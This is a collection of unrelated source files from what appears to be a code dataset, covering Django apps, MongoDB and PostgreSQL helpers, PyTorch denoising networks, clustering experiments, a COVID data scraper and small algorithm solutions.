return None
class MyAndEmptyRecordsStrategy(ListStrategy):
def execute_list_strategy(self, user):
res = list()
contragents = Contragent.objects.all()
for c in contragents:
tmp_pack = c.get_active_package()
if tmp_pack:
tmp_state = tmp_pack.package_state
if tmp_state:
if tmp_state.is_permitted(user) and (
user in c.current_user):
res.append(c)
else:
res.append(c)
else:
res.append(c)
return res
def execute_single_strategy(self, pk, user):
try:
contragent = Contragent.objects.get(pk=pk)
tmp_pack = contragent.get_active_package()
if tmp_pack:
tmp_state = tmp_pack.package_state
if tmp_state:
if tmp_state.is_permitted(user) and (
user in contragent.current_user):
return contragent
return contragent
except Contragent.DoesNotExist:
return None
STRATEGIES_LIST = ['Мои записи и пустые', 'Все по отделу', 'Все',
'Только мои записи', 'Только пустые записи']
STRATEGIES_TUPLES = list(enumerate(STRATEGIES_LIST))
STRATEGIES_FUNCTIONS = [MyAndEmptyRecordsStrategy, AllInDepartmentRecords,
AllRecords, OnlyMyRecordsStrategy, OnlyEmptyRecords]
STRATEGIES = dict(zip(STRATEGIES_LIST, STRATEGIES_FUNCTIONS))
ZIP_FILES_ACTIONS = {
0: "Скачать весь пакет",
1: "Скачать основные файлы",
2: "Скачать акты",
3: "Скачать счета",
4: "Скачать счета фактуры",
5: "Скачать прочие файлы",
}
|
7,618 | e79505e802a06f091bbb12708c45e04c4e80da60 | import FWCore.ParameterSet.Config as cms
from RecoTracker.MeasurementDet.UpdaterService_cfi import *
from RecoTracker.MeasurementDet.MeasurementTrackerESProducer_cfi import *
|
7,619 | b5f88a6d119f2c3ce8fb77cf8c45b6c9252f5128 | from pymongo import MongoClient
class MongoDB():
def __init__(self, host, port, db, table):
self.host = host
self.port = port
self.client = MongoClient(host=self.host, port=self.port)
self.db = self.client[db]
self.table = self.db[table]
# 获取一条数据
def get_one(self, query):
return self.table.find_one(query, property={"_id":False})
# 获取多条数据
def get_all(self, query):
return self.table.find(query)
# 添加数据
def add(self, kv_dict):
return self.table.insert_one(kv_dict)
# 删除数据
def delete(self, query):
return self.table.delete_many(query)
# 查看集合中是否包含满足的数据 如果有返回True
def check(self, query):
return self.table.find_one(query)
|
7,620 | 9289eb32db145187c5b4140e32acff520be8366e | from models import Ban
from django.shortcuts import render_to_response
class IPBanMiddleware(object):
"""
Simple middleware for taking care of bans from specific IP's
Redirects the banned user to a ban-page with an explanation
"""
def process_request(self, request):
ip = request.META['REMOTE_ADDR'] # user's IP
# see if user is banned
try:
# if this doesnt throw an exception, user is banned
ban = Ban.objects.get(ip=ip)
if ban.banned():
# return the "ban page"
return render_to_response("ban/banned.html",
{"reason": ban.reason, "unbandate": ban.unbandate()})
else:
# User was previously banned, but the ban is over by now
ban.delete()
pass
except Ban.DoesNotExist: # not banned! goodie
pass
|
7,621 | 70964ac617847dd4bf4a60a142afc94d0f284a24 | #!/usr/bin/env python
# coding: utf-8
# # Lesson 2 Demo 3: Creating Fact and Dimension Tables with Star Schema
#
# <img src="images/postgresSQLlogo.png" width="250" height="250">
# ### Walk through the basics of modeling data using Fact and Dimension tables. In this demo, we will:<br>
# <ol><li>Create both Fact and Dimension tables<li>Show how this is a basic element of the Star Schema.
# ### Import the library
# Note: An error might popup after this command has executed. If it does, read it carefully before ignoring.
# In[ ]:
import psycopg2
# ### Create a connection to the database
# In[ ]:
try:
conn = psycopg2.connect("host=127.0.0.1 dbname=studentdb user=student password=student")
except psycopg2.Error as e:
print("Error: Could not make connection to the Postgres database")
print(e)
# ### Next use that connection to get a cursor that we will use to execute queries.
# In[ ]:
try:
cur = conn.cursor()
except psycopg2.Error as e:
print("Error: Could not get curser to the Database")
print(e)
# ### For this demo we will use automatic commit so that each action is commited without having to call conn.commit() after each command. The ability to rollback and commit transactions are a feature of Relational Databases.
# In[ ]:
conn.set_session(autocommit=True)
# ### Let's imagine we work at an online Music Store. There will be many tables in our database but let's just focus on 4 tables around customer purchases.
#
# `Table Name: customer_transactions
# column: Customer Id
# column: Store Id
# column: Spent`
#
# `Table Name: Customer
# column: Customer Id
# column: Name
# column: Rewards`
#
# `Table Name: store
# column: Store Id
# column: State`
#
# `Table Name: items_purchased
# column: customer id
# column: Item Name`
#
# <img src="images/starSchema.png" width="750" height="750">
#
# #### From this representation we can already start to see the makings of a "STAR". We have one fact table (the center of the star) and 3 dimension tables that are coming from it.
# ### Let's create the Fact Table and insert the data into the table
# In[ ]:
try:
cur.execute("CREATE TABLE IF NOT EXISTS customer_transactions (customer_id int, store_id int, spent numeric);")
except psycopg2.Error as e:
print("Error: Issue creating table")
print (e)
#Insert into all tables
try:
cur.execute("INSERT INTO customer_transactions (customer_id, store_id, spent) VALUES (%s, %s, %s)", (1, 1, 20.50))
except psycopg2.Error as e:
print("Error: Inserting Rows")
print (e)
try:
cur.execute("INSERT INTO customer_transactions (customer_id, store_id, spent) VALUES (%s, %s, %s)", (2, 1, 35.21))
except psycopg2.Error as e:
print("Error: Inserting Rows")
print (e)
# ### Let's create our Dimension Tables and insert data into those tables.
# In[ ]:
try:
cur.execute("CREATE TABLE IF NOT EXISTS items_purchased (customer_id int, item_number int, item_name varchar);")
except psycopg2.Error as e:
print("Error: Issue creating table")
print (e)
try:
cur.execute("INSERT INTO items_purchased (customer_id, item_number, item_name) VALUES (%s, %s, %s)", (1, 1, "Rubber Soul"))
except psycopg2.Error as e:
print("Error: Inserting Rows")
print (e)
try:
cur.execute("INSERT INTO items_purchased (customer_id, item_number, item_name) VALUES (%s, %s, %s)", (2, 3, "Let It Be"))
except psycopg2.Error as e:
print("Error: Inserting Rows")
print (e)
try:
cur.execute("CREATE TABLE IF NOT EXISTS store (store_id int, state varchar);")
except psycopg2.Error as e:
print("Error: Issue creating table")
print (e)
try:
cur.execute("INSERT INTO store (store_id, state) VALUES (%s, %s)", (1, "CA"))
except psycopg2.Error as e:
print("Error: Inserting Rows")
print (e)
try:
cur.execute("INSERT INTO store (store_id, state) VALUES (%s, %s)", (2, "WA"))
except psycopg2.Error as e:
print("Error: Inserting Rows")
print (e)
try:
cur.execute("CREATE TABLE IF NOT EXISTS customer (customer_id int, name varchar, rewards boolean);")
except psycopg2.Error as e:
print("Error: Issue creating table")
print (e)
try:
cur.execute("INSERT INTO customer (customer_id, name, rewards) VALUES (%s, %s, %s)", (1, "Amanda", True))
except psycopg2.Error as e:
print("Error: Inserting Rows")
print (e)
try:
cur.execute("INSERT INTO customer (customer_id, name, rewards) VALUES (%s, %s, %s)", (2, "Toby", False))
except psycopg2.Error as e:
print("Error: Inserting Rows")
print (e)
# **We can do a variety of queries on this data easily because of utilizing the fact/dimension and Star Schema**
#
# * _Query 1_: Find all the customers that spent more than 30 dollars, who are they, what did they buy and if they are a rewards member
#
# * _Query 2_: How much did Store 1 sell?
# _Query 1:_ Find all the customers that spent more than 30 dollars, who are they, what did they buy and if they are a rewards member
# In[ ]:
try:
cur.execute("SELECT name, item_name, rewards FROM ((customer_transactions JOIN customer ON customer.customer_id=customer_transactions.customer_id) JOIN items_purchased ON customer_transactions.customer_id=items_purchased.customer_id) WHERE spent > 30 ;")
except psycopg2.Error as e:
print("Error: select *")
print (e)
row = cur.fetchone()
while row:
print(row)
row = cur.fetchone()
# _Query 2:_ How much did Store 1 sell?
# In[ ]:
try:
cur.execute("SELECT store_id, SUM(spent) FROM customer_transactions GROUP BY store_id;")
except psycopg2.Error as e:
print("Error: select *")
print (e)
row = cur.fetchone()
while row:
print(row)
row = cur.fetchone()
# ### Summary: What you can see here is from this elegant schema we were able to get "facts/metrics" from our fact table (how much each store sold), and also information about our customers that will allow us to do more indepth analytics to get answers to business questions by utilizing our fact and dimension tables.
# ### For the sake of the demo, I will drop the table.
# In[ ]:
try:
cur.execute("DROP table customer_transactions")
except psycopg2.Error as e:
print("Error: Dropping table")
print (e)
try:
cur.execute("DROP table items_purchased")
except psycopg2.Error as e:
print("Error: Dropping table")
print (e)
try:
cur.execute("DROP table customer")
except psycopg2.Error as e:
print("Error: Dropping table")
print (e)
try:
cur.execute("DROP table store")
except psycopg2.Error as e:
print("Error: Dropping table")
print (e)
# ### And finally close your cursor and connection.
# In[ ]:
cur.close()
conn.close()
# In[ ]:
|
7,622 | 4cefaa964251e77a05066af1f61f9fd2a4350d38 | #!/usr/bin/env python
import sys,re
print('\n'.join(re.findall(r'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+',sys.stdin.read())))
|
7,623 | fa566eb77b17830acad8c7bfc2b958760d982925 | from django.db import models
# from rest_framework import permissions
from drawAppBackend import settings
# from django.contrib.auth.models import AbstractUser
# Create your models here.
class DrawApp(models.Model):
title = models.CharField(max_length=120)
description = models.TextField()
completed = models.BooleanField(default=False)
def _str_(self):
return self.title
class SavedDrawings(models.Model):
username = models.ForeignKey(
settings.AUTH_USER_MODEL, on_delete=models.CASCADE, null=True)
saveId = models.IntegerField()
saveName = models.CharField(max_length=500)
corners = models.TextField()
# class CustomUser(AbstractUser):
# # Any extra fields would go here
# def __str__(self):
# return self.email
|
7,624 | f0e4cd13571728d61566c4093586c91323629e0b | # coding: utf-8
import numpy as np
def sparse(n, k):
u"""
return k sparse vector,
the value of non-zero entries are
normal distributed N(0,1).
[args]
n: size of vector
k: number of nonzero entries
[return]
k-sparse vector
"""
z = np.zeros(n)
for i in np.random.choice( np.arange(n), k, replace=None ): # supports of nonzero entries
z[i] = np.random.randn()
return z
def compressible(n, k, e=0.1):
u"""
perform IHT
[args]
n: size of vector
k: number of nonzero entries
e: noise factor (x e)
[return]
k-compressible vector
"""
z = sparse(n, k) + e * np.random.randn(n)
return z
if __name__ == '__main__':
s = 2
print "%s-sparse vector:" % s
print sparse(10, s)
print compressible(10, s, 0.1)
|
7,625 | 7d873ed216355d1688ec79ff337304d8ebfd2754 | class Solution:
def subsets(self, nums: List[int]) -> List[List[int]]:
'''
ans = set()
n = len(nums)
for x, val in enumerate(nums):
for y in range(x + 1, n + 1):
ans.add(frozenset(nums[x:y]))
for u in range(0, x + 1):
for z in range(y + 1, n + 1):
ans.add(frozenset([nums[u]] + nums[y:z + 1]))
ans.add(frozenset(nums[0:u + 1] + nums[y:z + 1]))
ans.add(frozenset([nums[u]] + nums[z:n + 1]))
ans.add(frozenset(nums[0:u + 1] + nums[z:n + 1]))
ans.add(frozenset([]))
return ans
'''
all_subsets = [[]]
if nums:
for num in nums:
for idx in range(len(all_subsets)):
all_subsets.append(all_subsets[idx] + [num])
return all_subsets
|
7,626 | 9c60d82d42716abb036dc7297a2dca66f0508984 | import os
import numpy as np
import torch
from torch import nn
from torch.nn import functional as F
import torch.utils.data as td
import torchvision as tv
import pandas as pd
from PIL import Image
from matplotlib import pyplot as plt
from utils import imshow, NNRegressor
class DnCNN(NNRegressor):
def __init__(self, D, C=64):
super(DnCNN, self).__init__()
self.D = D
# convolution layers
self.conv = nn.ModuleList()
self.conv.append(nn.Conv2d(3, C, 3, padding=1))
self.conv.extend([nn.Conv2d(C, C, 3, padding=1) for _ in range(D)])
self.conv.append(nn.Conv2d(C, 3, 3, padding=1))
# apply He's initialization
for i in range(len(self.conv[:-1])):
nn.init.kaiming_normal_(
self.conv[i].weight.data, nonlinearity='relu')
# batch normalization
self.bn = nn.ModuleList()
self.bn.extend([nn.BatchNorm2d(C, C) for _ in range(D)])
# initialize the weights of the Batch normalization layers
for i in range(D):
nn.init.constant_(self.bn[i].weight.data, 1.25 * np.sqrt(C))
def forward(self, x):
D = self.D
h = F.relu(self.conv[0](x))
for i in range(D):
h = F.relu(self.bn[i](self.conv[i+1](h)))
y = self.conv[D+1](h) + x
return y
class UDnCNN(NNRegressor):
def __init__(self, D, C=64):
super(UDnCNN, self).__init__()
self.D = D
# convolution layers
self.conv = nn.ModuleList()
self.conv.append(nn.Conv2d(3, C, 3, padding=1))
self.conv.extend([nn.Conv2d(C, C, 3, padding=1) for _ in range(D)])
self.conv.append(nn.Conv2d(C, 3, 3, padding=1))
# apply He's initialization
for i in range(len(self.conv[:-1])):
nn.init.kaiming_normal_(
self.conv[i].weight.data, nonlinearity='relu')
# batch normalization
self.bn = nn.ModuleList()
self.bn.extend([nn.BatchNorm2d(C, C) for _ in range(D)])
# initialize the weights of the Batch normalization layers
for i in range(D):
nn.init.constant_(self.bn[i].weight.data, 1.25 * np.sqrt(C))
def forward(self, x):
D = self.D
h = F.relu(self.conv[0](x))
h_buff = []
idx_buff = []
shape_buff = []
for i in range(D//2-1):
shape_buff.append(h.shape)
h, idx = F.max_pool2d(F.relu(self.bn[i](self.conv[i+1](h))),
kernel_size=(2, 2), return_indices=True)
h_buff.append(h)
idx_buff.append(idx)
for i in range(D//2-1, D//2+1):
h = F.relu(self.bn[i](self.conv[i+1](h)))
for i in range(D//2+1, D):
j = i - (D // 2 + 1) + 1
h = F.max_unpool2d(F.relu(self.bn[i](self.conv[i+1]((h+h_buff[-j])/np.sqrt(2)))),
idx_buff[-j], kernel_size=(2, 2), output_size=shape_buff[-j])
y = self.conv[D+1](h) + x
return y
class DUDnCNN(NNRegressor):
def __init__(self, D, C=64):
super(DUDnCNN, self).__init__()
self.D = D
# compute k(max_pool) and l(max_unpool)
k = [0]
k.extend([i for i in range(D//2)])
k.extend([k[-1] for _ in range(D//2, D+1)])
l = [0 for _ in range(D//2+1)]
l.extend([i for i in range(D+1-(D//2+1))])
l.append(l[-1])
# holes and dilations for convolution layers
holes = [2**(kl[0]-kl[1])-1 for kl in zip(k, l)]
dilations = [i+1 for i in holes]
# convolution layers
self.conv = nn.ModuleList()
self.conv.append(
nn.Conv2d(3, C, 3, padding=dilations[0], dilation=dilations[0]))
self.conv.extend([nn.Conv2d(C, C, 3, padding=dilations[i+1],
dilation=dilations[i+1]) for i in range(D)])
self.conv.append(
nn.Conv2d(C, 3, 3, padding=dilations[-1], dilation=dilations[-1]))
# apply He's initialization
for i in range(len(self.conv[:-1])):
nn.init.kaiming_normal_(
self.conv[i].weight.data, nonlinearity='relu')
# batch normalization
self.bn = nn.ModuleList()
self.bn.extend([nn.BatchNorm2d(C, C) for _ in range(D)])
# initialize the weights of the Batch normalization layers
for i in range(D):
nn.init.constant_(self.bn[i].weight.data, 1.25 * np.sqrt(C))
def forward(self, x):
D = self.D
h = F.relu(self.conv[0](x))
h_buff = []
for i in range(D//2 - 1):
torch.backends.cudnn.benchmark = True
h = self.conv[i+1](h)
torch.backends.cudnn.benchmark = False
h = F.relu(self.bn[i](h))
h_buff.append(h)
for i in range(D//2 - 1, D//2 + 1):
torch.backends.cudnn.benchmark = True
h = self.conv[i+1](h)
torch.backends.cudnn.benchmark = False
h = F.relu(self.bn[i](h))
for i in range(D//2 + 1, D):
j = i - (D//2 + 1) + 1
torch.backends.cudnn.benchmark = True
h = self.conv[i+1]((h + h_buff[-j]) / np.sqrt(2))
torch.backends.cudnn.benchmark = False
h = F.relu(self.bn[i](h))
y = self.conv[D+1](h) + x
return y
|
7,627 | 991b124d365443744c946b258504c97e9076dcea | from django.urls import path, include
from django.conf.urls import url, re_path
#from rest_framework.urlpatterns import format_suffix_patterns
from .views import (HomePageView,
WordViewSet, WordNormalViewSet,
TextViewSet, TextNormalViewSet, TextTagViewSet,
TagSetViewSet, TagViewSet, TokenViewSet, TokenTagViewSet,
ValidatorViewSet, NormalizerViewSet,
TaggerViewSet,
)
from rest_framework.routers import DefaultRouter, SimpleRouter
class OptionalSlashRouter(DefaultRouter):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.trailing_slash = '/?'
router = OptionalSlashRouter()
router.register(r'words', WordViewSet)
router.register(r'word-normals', WordNormalViewSet)
router.register(r'texts', TextViewSet)
router.register(r'text-normals', TextNormalViewSet)
router.register(r'text-tags', TextTagViewSet)
router.register(r'tag-sets', TagSetViewSet)
router.register(r'tags', TagViewSet)
router.register(r'tokens', TokenViewSet)
router.register(r'token-tags', TokenTagViewSet)
router.register(r'validators', ValidatorViewSet)
router.register(r'normalizers', NormalizerViewSet)
router.register(r'taggers', TaggerViewSet)
# router.register(r'sentences', SentenceViewSet)
# router.register(r'normal-sentences', NormalSentenceViewSet)
# router.register(r'tagged-sentences', TaggedSentenceViewSet)
# router.register(r'rules/translation-characters', TranslationCharacterViewSet)
# router.register(r'rules/refinement-patt/erns', RefinementPatternViewSet)
urlpatterns = [
re_path(r'^$', HomePageView.as_view(), name='home'),
re_path(r'^api/', include(router.urls)),
]
# urlpatterns = [
# # url('', HomePageView.as_view(), name = 'home'),
# path('', views.index, name='home'),
# path('word/', WordCreateView.as_view(), name="words"),
# path('word/<int:pk>/', WordDetailsView.as_view(), name="word"),
# path('text/fix/', views.fix_text, name="fix_text"),
# ]
#urlpatterns = format_suffix_patterns(urlpatterns)
# class OptionalSlashRouter(SimpleRouter):
# def __init__(self):
# self.trailing_slash = '/?'
# super().__init__()
# # super(SimpleRouter, self).__init__()
# router.register(r'', HomeViewSet, basename='home')
# router.register(r'api', router.APIRootView, basename='api')
# router.register(r'schema', router.APISchemaView, basename='schema') |
7,628 | 98a1fab8cee91f37ceee2cfd868d3a5756a055b0 | import numpy as np
from sklearn.naive_bayes import BernoulliNB
X = np.array([[1, 2, 3, 3], [1, 3, 4, 4], [2, 4, 5, 5]])
y = np.array([1, 2, 3])
"""
alpha: 平滑系数
binarize: 将特征二值化的阈值
fit_prior: 使用数据拟合先验概率
"""
clf = BernoulliNB(alpha=2.0, binarize=3.0, fit_prior=True)
clf.fit(X, y)
print("class_prior:", clf.class_prior)
print("class_count_:", clf.class_count_) # 按类别顺序输出其对应个数
print("class_log_prior_:", clf.class_log_prior_) # 先验概率对数值
print("feature_count_:", clf.feature_count_) # 各类别个特征之和
print("n_features_:", clf.n_features_)
print("feature_log_prob_:", clf.feature_log_prob_) # 指定类的各特征的条件概率的对数
# 其他参数与方法与MultinomialNB类似
|
7,629 | fd4d785d933c3a200f4aba094ecfe1e1c76737a5 | from django.apps import AppConfig
class Sharem8Config(AppConfig):
name = 'ShareM8'
|
7,630 | 235623c3f557dbc28fbff855a618e4d26932ca65 | from . import cli
cli.run()
|
7,631 | 06627821c09d02543974a3c90664e84e11c980ed | """PriceTrail URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.11/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url
from django.contrib import admin
from django.contrib.auth import views as auth_views
from .views import validate_product, display_product
#user related views
from .views import index_view, login_view, register_view, profile_view
#products related views
from .views import my_products_view, delete_product, add_new_product, dashboard_view, test_email_notifications, edit_profile_view, product_details_view, \
test_update_prices, test_update_all_prices
urlpatterns = [
url(r'^admin/', admin.site.urls),
url(r'^logout/$', auth_views.logout, {'next_page': '/'}, name='logout'),
# implemented views
url(r'^$', index_view, name='index'),#this will became index
url(r'^login/$', login_view, name='login'),
url(r'^register/$', register_view, name='register'),
url(r'^profile/$', profile_view, name='profile'),
url(r'^my-products/$', my_products_view, name='my-products'),
url(r'^my-products/(?P<filter>[\w-]+)', my_products_view, name='my-products'),
url(r'^delete-product/(?P<id>\d+)/', delete_product, name='delete-product'),
url(r'^add-new-product/$', add_new_product, name='add-new-product'),
url(r'^validate-product/$', validate_product, name='validate-product'),
url(r'^dashboard/$', dashboard_view, name='dashboard'),
url(r'^edit-profile/$', edit_profile_view, name='edit-profile'),
#modal window
url(r'^display-product/(?P<id>\d+)/', display_product, name='display-product'),
url(r'^product-details/(?P<id>\d+)/', product_details_view, name='product-details'),
#superuser endpoints
url(r'^test_notifications/$', test_email_notifications, name='test-view'),
url(r'^test_update_prices/(?P<id>\w+)/', test_update_prices, name='update-prices'),
url(r'^test_update_all_prices/$', test_update_all_prices, name='update-all-prices'),
]
|
7,632 | f1d813ccaf49c8941bf594e22d8683c0ab422a22 | from flask import Flask
from flask_bcrypt import Bcrypt
from flask_jwt_extended import JWTManager
from flask_migrate import Migrate
from flask_restful import Api
from flask_apispec.extension import FlaskApiSpec
from server.admin import add_admin
from server.config import Config
from server.db import db
from server.cli import add_commands
from server.login_manager import login_manager
from server.resources import add_routes, register_docs
from server.services import user_service, token_blacklist
app = Flask(__name__)
app.config.from_object(Config)
db.init_app(app)
migrate = Migrate(app, db)
admin = add_admin(app)
api = Api(app, catch_all_404s=True)
jwt = JWTManager(app)
bcrypt = Bcrypt(app)
@jwt.user_lookup_loader
def user_loader_callback(_jwt_header, jwt_data):
return user_service.first(id=jwt_data['sub'])
@jwt.user_identity_loader
def user_identity_lookup(email):
return user_service.first(email=email).id
@jwt.token_in_blocklist_loader
def check_if_token_in_blocklist(jwt_headers, jwt_payload):
return bool(token_blacklist.get(jwt_payload['jti']))
def create_app():
add_routes(api)
add_commands(app)
login_manager.init_app(app)
docs = FlaskApiSpec(app)
register_docs(docs)
return app
|
7,633 | 0677e12bc9733c76bff7ed3fe83e3800e64e9a10 | import re
import requests
import numpy as np
import json
import os
from collections import OrderedDict
import pandas as pd
import json
import datetime
import time
#将数组写入json文件方便pandas的读取
def write_list_to_json(list, json_file_name, json_file_save_path):
os.chdir(json_file_save_path)
with open(json_file_name, 'w') as f:
json.dump(list, f)
#获取数据算法
def getworld_data(url,header):
headers = header
res = requests.get(url,headers = headers)
res.encoding = "UTF-8"
pattern = re.compile('(\'\{"(\w+)":{"active":(.*?),"confirmed":(.*?),"deaths":(.*?),"recovered":(.*?),"relative_active":(.*?),"relative_active_start_date":(.*?),"relative_confirmed":(.*?),"relative_confirmed_start_date":(.*?),"relative_deaths":(.*?),"relative_deaths_start_date":(.*?),"relative_recovered":(.*?),"relative_recovered_start_date":(.*?)}\}\')',re.S)
end = re.findall(pattern,res.text)
a=str(end[0])
with open('test.txt','w') as f:
f.write(a)
data_relative_confirmed_json=[]
pattern_1 = re.compile('(\w+)":{"active":(.*?),"confirmed":(.*?),"deaths":(.*?),"recovered":(.*?),"relative_active":(.*?),"relative_active_start_date":(.*?),"relative_confirmed":(.*?),"relative_confirmed_start_date":(.*?),"relative_deaths":(.*?),"relative_deaths_start_date":(.*?),"relative_recovered":(.*?),"relative_recovered_start_date":(.*?)}',re.S)
end_1=re.findall(pattern_1,a)
return end_1
#时间推算算法及数据写入
def count_time(end_1):
data_relative_confirmed_json=[]
country=[]
for i in range(len(end_1)):
data={
'Country':'',
}
data['Country']=end_1[i][0]
#确诊人数
country.append(end_1[i][0])
care=end_1[i][5].replace('[','').replace(']','').split(',')
try:
time=end_1[i][6].replace('/',',').replace('/',',').replace('"','').split(',')
print(time)
time[2]='2020'
date=[]
in_date = time[2]+'-'+time[0]+'-'+time[1]
dt = datetime.datetime.strptime(in_date, "%Y-%m-%d")
for k in range(len(end_1[i][5].replace('[','').replace(']','').split(','))):
out_date = (dt + datetime.timedelta(days=1)).strftime("%Y-%m-%d")
dt=datetime.datetime.strptime(out_date, "%Y-%m-%d")
date.append(out_date)
print(date)
time_care=OrderedDict(zip(date,care))
print(time_care)
date_json=OrderedDict(data,**time_care)
data_relative_confirmed_json.append(date_json)
except:
pass
return data_relative_confirmed_json
def write_json_to_csv(data_relative_confirmed_json,end_1):
write_list_to_json(data_relative_confirmed_json,'20200517-world-active-data.json','E:/python_code/world_cov19')
data_csv=pd.DataFrame(json.loads(open('20200517-world-active-data.json','r+').read()))
print(end_1[36][0])
care=end_1[36][5].replace('[','').replace(']','').split(',')
try:
time=end_1[36][6].replace('/',',').replace('/',',').replace('"','').split(',')
print(time)
time[2]='2020'
date=[]
in_date = time[2]+'-'+time[0]+'-'+time[1]
dt = datetime.datetime.strptime(in_date, "%Y-%m-%d")
for k in range(len(end_1[36][5].replace('[','').replace(']','').split(','))):
out_date = (dt + datetime.timedelta(days=1)).strftime("%Y-%m-%d")
dt=datetime.datetime.strptime(out_date, "%Y-%m-%d")
date.append(out_date)
print(date)
time_care=OrderedDict(zip(date,care))
print(time_care)
except:
pass
date.insert(0,'Country')
cols=date
data_csv=data_csv.loc[:,cols]
data_csv.T
data_csv.to_csv('20200517-world-active-data.json.csv')
df=pd.read_csv('20200517-world-active-data.json.csv')
new_csv=df.T
new_csv.to_csv('20200517-world-active-data.json.csv')
|
7,634 | 5807d1c2318ffa19d237d77fbe3f4c1d51da8601 | import numpy as np
import matplotlib.pyplot as plt
from sklearn import mixture, metrics
import utils
import spsa_clustering
N = 5000
mix_prob = np.array([0.4, 0.4, 0.2])
clust_means = np.array([[0, 0], [2, 2], [-3, 6]])
clust_gammas = np.array([[[1, -0.7], [-0.7, 1]], np.eye(2), [[1, 0.8], [0.8, 1]]])
data_set = []
true_labels = []
spsa_gamma = 1. / 6
spsa_alpha = lambda x: 0.25 / (x ** spsa_gamma)
spsa_beta = lambda x: 15. / (x ** (spsa_gamma / 4))
# spsa_alpha = lambda x: 0.001
# spsa_beta = lambda x: 0.001
clustering = spsa_clustering.ClusteringSPSA(n_clusters=clust_means.shape[0], data_shape=2, Gammas=None, alpha=spsa_alpha,
beta=spsa_beta, norm_init=False, eta=1000)
for _ in range(N):
mix_ind = np.random.choice(len(mix_prob), p=mix_prob)
data_point = np.random.multivariate_normal(clust_means[mix_ind],
clust_gammas[mix_ind])
data_set.append(data_point)
true_labels.append(mix_ind)
clustering.fit(data_point)
data_set = np.array(data_set)
utils.order_clust_centers(clust_means, clustering)
clustering.clusters_fill(data_set)
gmm = mixture.GaussianMixture(n_components=clust_means.shape[0], init_params='kmeans')
gmm.fit(data_set)
labels_pred_gmm = gmm.predict(data_set)
bgmm = mixture.BayesianGaussianMixture(n_components=clust_means.shape[0], init_params='random')
bgmm.fit(data_set)
labels_pred_bgmm = bgmm.predict(data_set)
ari_gmm = metrics.adjusted_rand_score(true_labels, labels_pred_gmm)
print('\nARI GMM: {:f}'.format(ari_gmm))
ari_bgmm = metrics.adjusted_rand_score(true_labels, labels_pred_bgmm)
print('ARI Bayesian GMM: {:f}'.format(ari_bgmm))
ari_spsa = metrics.adjusted_rand_score(true_labels, clustering.labels_)
print('ARI SPSA clustering: {:f}'.format(ari_spsa))
print('\n')
for i in range(clust_means.shape[0]):
print('GMM covar matrix distance {0}: {1:f}'.format(i,
np.linalg.norm(clust_gammas[i] - gmm.covariances_[i])))
print('\n')
for i in range(clust_means.shape[0]):
print('Bayesian GMM covar matrix distance {0}: {1:f}'.format(i,
np.linalg.norm(clust_gammas[i] - bgmm.covariances_[i])))
print('\n')
for i in range(clust_means.shape[0]):
print('SPSA clustering covar matrix distance {0}: {1:f}'.format(i,
np.linalg.norm(clust_gammas[i] - clustering.Gammas[i])))
plt.style.use('grayscale')
utils.plot_centers(clust_means, clustering)
utils.plot_centers_converg(clust_means, clustering)
# utils.plot_clustering_cov(data_set, clustering.labels_, 'SPSA clustering partition', clustering.cluster_centers_,
# clustering.Gammas)
# utils.plot_clustering_cov(data_set, true_labels, 'True partition', clust_means, clust_gammas)
# utils.plot_clustering_cov(data_set, labels_pred_gmm, 'GMM partition', gmm.means_, gmm.covariances_)
# utils.plot_clustering_cov(data_set, labels_pred_bgmm, 'Bayesian GMM partition', bgmm.means_, bgmm.covariances_)
plt.show()
|
7,635 | 2f7be68f08716d5d04d064d81eecb53eb9b80174 | # -*- coding: utf-8 -*-
# Generated by Django 1.10.6 on 2017-04-03 14:45
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('productores', '0002_auto_20170327_0841'),
]
operations = [
migrations.AddField(
model_name='productor',
name='edad',
field=models.IntegerField(choices=[(1, 'Menor 35'), (2, 'Mayor 35')], default=1, editable=False),
preserve_default=False,
),
]
|
7,636 | 44d1412d48886eb9126a895d61004e6ccbd4850b | #!/usr/bin/env python
import sys
import random
def apply(mine, target, diff):
if mine == [1, 1, 1, 1] or target == [1, 1, 1, 1]:
return -1
if diff < 0:
for i in range(0, 4):
if i - diff < 4:
mine[i] = mine[i - diff]
else:
mine[i] = 0
elif diff > 0:
for i in range(3, -1, -1):
if i - diff > -1:
mine[i] = mine[i - diff]
else:
mine[i] = 0
count = 0
for i in range(0, 4):
target[i] ^= mine[i]
if target[i]:
count += 1
return count
while True:
turn = int(raw_input())
finger = [[], []]
for i in range(0, 2):
for j in range(0, 2):
finger[i].append([int(k) for k in raw_input().split()])
maximum = -1
response = []
for i in range(0, 2):
for j in range(0, 2):
for k in range(-3, 4):
result = apply(finger[0][i], finger[1][j], k)
if result > maximum:
maximum = result
response = [(i, j, k)]
elif result == maximum:
response.append((i, j, k))
if maximum != -1:
print ' '.join([str(i) for i in random.choice(response)])
else:
print '2 2 0'
sys.stdout.flush()
|
7,637 | 069d85370d8358aa884b5195a1b52c0014efd161 | from collections import Counter
class Solution:
def minDominoRotations(self, A: List[int], B: List[int]) -> int:
if not A or not B:
return 0
if len(A) != len(B):
return -1
cnt_a, cnt_b = Counter(A), Counter(B)
check_list = []
for num, freq in cnt_a.items():
check_list.append((freq, num, 'a'))
for num, freq in cnt_b.items():
check_list.append((freq, num, 'b'))
check_list.sort(reverse=True)
cnt = 0
for freq, target, lst in check_list:
if lst == 'a':
to_list, from_list = A, B
else:
to_list, from_list = B, A
invalid = False
for i in range(len(A)):
if to_list[i] == target:
continue
if from_list[i] != target:
invalid = True
break
cnt += 1
if not invalid:
return cnt
return -1
|
7,638 | 45658cdfcd1529bbf803294cd7cec32d6d2c2198 | import pygame
class DrawingBrush():
def __init__(self, size, color, radius):
self.drawSurface = pygame.Surface(size, pygame.SRCALPHA, 32).convert_alpha()
self.drawColor = color
self.size = radius
self.winSize = size
self.winSurface = pygame.display.get_surface()
